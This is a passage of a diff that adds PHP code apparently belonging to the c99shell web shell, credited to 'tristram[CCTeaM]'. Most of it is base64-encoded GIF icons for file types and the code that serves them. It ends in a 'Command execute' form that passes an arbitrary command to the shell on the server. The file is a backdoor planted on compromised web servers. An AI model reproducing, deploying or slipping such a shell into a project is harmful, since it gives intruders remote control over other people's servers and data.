+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+?> 
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; 